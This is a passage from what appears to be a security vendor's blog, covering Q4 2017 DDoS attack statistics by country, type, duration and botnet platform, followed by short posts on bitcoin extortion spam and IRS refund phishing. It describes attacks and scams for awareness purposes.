  • SYN DDoS remains the most common attack method, while the least popular is ICMP DDoS. According to Kaspersky DDoS Protection data, the frequency of multi-method attacks rose.
  • In Q4 2017, the share of Linux botnets climbed slightly to 71.19% of all attacks.
Geography of attacks

In Q4 2017, DDoS attacks affected 84 countries, which represents a slight improvement over the previous quarter, when 98 countries were hit. Traditionally, China is most in the firing line, although the country’s share of attacks decreased slightly (from 63.30% to 59.18%), approaching the Q2 level. The figures for the US and South Korea, which retained second and third place, went up slightly to 16.00% and 10.21%, respectively.

Fourth place went to Britain (2.70%), which climbed 1.4% to overtake Russia. Although Russia’s share of attacks dropped insignificantly (by 0.3%), that was enough to push it into sixth place behind Vietnam (1.26%), which made a return to the leaderboard, squeezing Hong Kong out of the top ten.

Distribution of DDoS attacks by country, Q3 and Q4 2017

The percentage of attacks directed against targets in the top ten countries grew in the last quarter (but not by much) to almost 92.90% vs. 91.27% in Q3 2017. The landscape is much the same as before.

About half of all targets are still in China (51.84%), followed by the US (19.32%), where the number of targets is again nearing 20% after a slight dip in Q3; South Korea is third with 10.37%. Vietnam again ousted Hong Kong from the top ten, taking ninth place with a 1.13% share, while Russia (1.21%) came seventh with a loss of 1%, making way for Britain (3.93%), France (1.60%), Canada (1.24%), and the Netherlands (1.22%), whose figures did not change much against the previous quarter.

Distribution of unique DDoS-attack targets by country, Q3 and Q4 2017

Dynamics of the number of DDoS attacks

Statistical analysis of specially prepared Linux servers —  so-called honeypot traps — shows that peak botnet activity this quarter occurred during the pre- and post-holiday sales. Feverish cybercriminal activity was clearly observed around Black Friday and Cyber Monday, dying down by the second third of December.

The most significant peaks occurred on November 24 and 29, when the number of individual IPs storming our resources doubled. Some increase in activity was also observed in late October — most likely Halloween-related.

Such fluctuations point to attempts by cybercriminals to boost their botnets in the run-up to major sales. Pre-holiday periods are incubators of cybercriminal growth for two reasons: first, users are less discerning and more likely to “surrender” their devices to intruders; second, the prospect of a fast buck makes it possible to blackmail Internet companies with lost profits or to offer one’s services in the cut-throat struggle online.

Dynamics of the number of Linux-based attacks in Q4 in 2017*
*Shows changes in the number of unique IPs per 24 hours


Types and duration of DDoS attacks

In Q4, the share of SYN DDoS attacks decreased (from 60.43% to 55.63%) due to less activity by the Linux-based Xor DDoS botnet. These attacks still rank first, however. The percentage of ICMP attacks (3.37%), still the least common, also fell. The relative frequency of other types of attacks increased, but whereas in the previous quarter TCP attacks ranked second after SYN, UDP overshadowed both these types, rising from second-to-last to second-from-top (in Q4 UDP DDoS accounted for 15.24% of all attacks).

Distribution of DDoS attacks by type, Q4 2017

Kaspersky DDoS Protection annual statistics show a decline in the popularity of DDoS attacks involving only pure HTTP and HTTPS flooding. The frequency of multi-method attacks rose accordingly. Nevertheless, one in three mixed attacks contained an HTTP or HTTPS flood. This may be due to the fact that HTTP(S) attacks are quite expensive and complex, while in a mixed attack they can be used by cybercriminals to increase the overall effectiveness without additional costs.

Correlation between attack types according to Kaspersky DDoS Protection, 2016 and 2017

The longest attack in Q4 was significantly shorter than its Q3 counterpart: 146 hours (about 6 days) vs. 215 (about 9). That’s barely half the Q2 and 2017 record of 277 hours. Overall, the share of longish attacks continues to decline, albeit insignificantly. This also applies to attacks lasting 100-139 hours and 50-99 hours (the shares of these categories are so small that even a change of 0.01% is news). The most common are still micro-attacks, lasting no more than four hours: their share rose slightly to 76.76% (vs. 76.09% in Q3). Also up was the proportion of attacks lasting 10-49 hours, but again not by much — about 1.5%.

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2017


C&C servers and botnet types

The top three countries by number of C&C servers remained as before: South Korea (46.63%), the US (17.26%), China (5.95%). Yet although the figures for the latter two climbed slightly against Q3, China had to share third place with Russia (7.14%), which gained 2%, the reason being that despite the fact that the leaders’ share changed insignificantly percentage-wise, in absolute terms the number of C&C servers detected in all three countries almost halved. This is at least partially due to the termination of many Nitol botnet admin servers and the less active Xor botnet. On a separate note, this category’s top ten welcomed Canada, Turkey, and Lithuania (1.19% each), while Italy, Hong Kong, and Britain departed the list.

Distribution of botnet C&C servers by country, Q4 2017

The steady increase in the number of Linux-based botnets continued this quarter: their share now stands at 71.19% against Q3’s 69.62%. Accordingly, the share of Windows-based botnets fell from 30.38% to 28.81%.

Correlation between Windows- and Linux-based botnet attacks, Q4 2017



Q4 2017 represented something of a lull: both the number and duration of DDoS attacks were down against the previous quarter. The final three months of 2017 were even calmer than the first three. Alongside the rising number of multicomponent attacks involving various combinations of SYN, TCP Connect, HTTP flooding, and UDP flooding techniques, the emerging pattern suggests a backsliding for DDoS botnets in general. Perhaps the economic climate or tougher law enforcement has made it harder to maintain large botnets, causing their operators to switch tactics and start combining components from a range of botnets.

At the same time, the increase in the number of attacks on honeypot traps in the runup to holiday sales indicates that cybercriminals are keen to expand their botnets at the most opportune moment, looking to grab a slice of the pie by pressuring owners of online resources and preventing them from making a profit. In any event, the DDoS spikes around Black Friday and Cyber Monday were a salient feature of this quarter.

Another aspect of the late fall/early winter period was the continued attacks on cryptocurrency exchanges in line with the trends of the past months. Such fervor on the part of cybercriminals is not surprising given the explosive growth in the price of Bitcoin and Monero. Barring a collapse in the exchange rate (short-term fluctuations that only encourage speculators do not count), these exchanges are set to remain a prime target throughout 2018.

What’s more, the last quarter showed that not only are DDoS attacks a means to make financial or political gain, but can produce accidental side effects, as we saw last December with the junk traffic generated by the Lethic spam bot. Clearly, the Internet is now so saturated with digital noise that an arbitrary resource can be hit by botnet activity without being the target of the attack or representing any value whatsoever to the attackers.

Every little bitcoin helps

Thu, 02/01/2018 - 04:03

It often happens that inventions and technologies that start out good end up turning into dangerous tools in the hands of criminals. Blockchain is no exception to this rule, especially in its most common cryptocurrency incarnation. Cryptocurrencies crop up in all kinds of spam: from traditional advertising (courses about investment and trade) to more fraudulent and malicious varieties. Quite often, cryptocurrencies are used by attackers as originally intended — as a means of payment (albeit from victims). We found and delved into several spam mailings in which cybercrooks exploited user paranoia about information threats and took bitcoins as payment for peace of mind. The attacks targeted employees of small companies, but such emails could be sent to any user’s personal mail.

In the first email, the attacker claimed to have installed malware on a porn site visited by the victim, and to be in possession of several videos recorded from both the device screen and cameras; not only that, a keylogger had supposedly provided access to the user’s IM, email, and social media contacts. To get the attacker off their back, the victim was asked to transfer the equivalent of $320 to the bitcoin wallet specified in the email. It was also mentioned that a built-in tracking pixel would inform the attacker that the email had been seen. And if the recipient wanted proof of that, they should reply to the message, whereupon the compromising info would be sent out to five of their contacts. As a postscript, the scammer warned against going to the police: he allegedly lived in Belarus, so the investigation would drag on for years.

The next email was wordy but imaginative, written by a hacker by the name of Andrey. The attacker informed the recipient that he had studied the latter’s company, together with its employees and their relatives, found weaknesses, and was planning to ruin it. The author listed no fewer than seven ways to achieve this goal, from simply writing negative reviews on various websites to creating fake company reports in his garage(!) and sending them to government departments. However, the hacker’s preferred outcome was for the company to see sense and transfer 3 bitcoins to his wallet. Like the previous email, it specifically mentioned not going to the cops, since “Andrey” lived in Ukraine.

Another email was the work of not one hacker, but an entire chain gang. The attackers allegedly had hacked the company’s server and got hold of information about its clients, bank accounts, tax payments, etc. Now they were threatening to damage the company’s reputation by publishing this information online. It was also stated that at some unspecified moment they would launch an attack on the company’s servers and computers, encrypting all data. To call off the attack, the blackmailers demanded 0.5 bitcoin. If the cryptopayment was not made before the start of the attack, the amount would rise to 2 bitcoins.

Sadly and (perhaps) surprisingly, some people still fall for such concoctions. The targets of these mailings are usually small companies that lack the resources for decent anti-spam protection and basic information security training for staff. So let us reiterate: be vigilant, stay calm, and take anonymous threats of this kind with a pinch of salt.

Cybercriminals target early IRS 2018 refunds now

Wed, 01/31/2018 - 12:54

On Monday, Jan 29th, IRS officially opened its 2018 season. Some taxpayers already filed their taxes and cybercriminals know it too. So, right after two days of the official 2018 season opening, we got phishing messages with a fake refund status Websites:

The link in the email leads to a hacked Brazilian restaurant, redirecting to Website with Australian domain zone.

So, the whole scheme is to steal credit card information of the taxpayers expecting a tax refund from IRS. Both URLs are blocked by Kaspersky Anti-Phishing now.

The mentioned Website was hacked and includes an old Webshell uploaded back to 2016.

Should we expect more campaigns like this? Definitely yes. Stay watchful and don’t lose your refunds!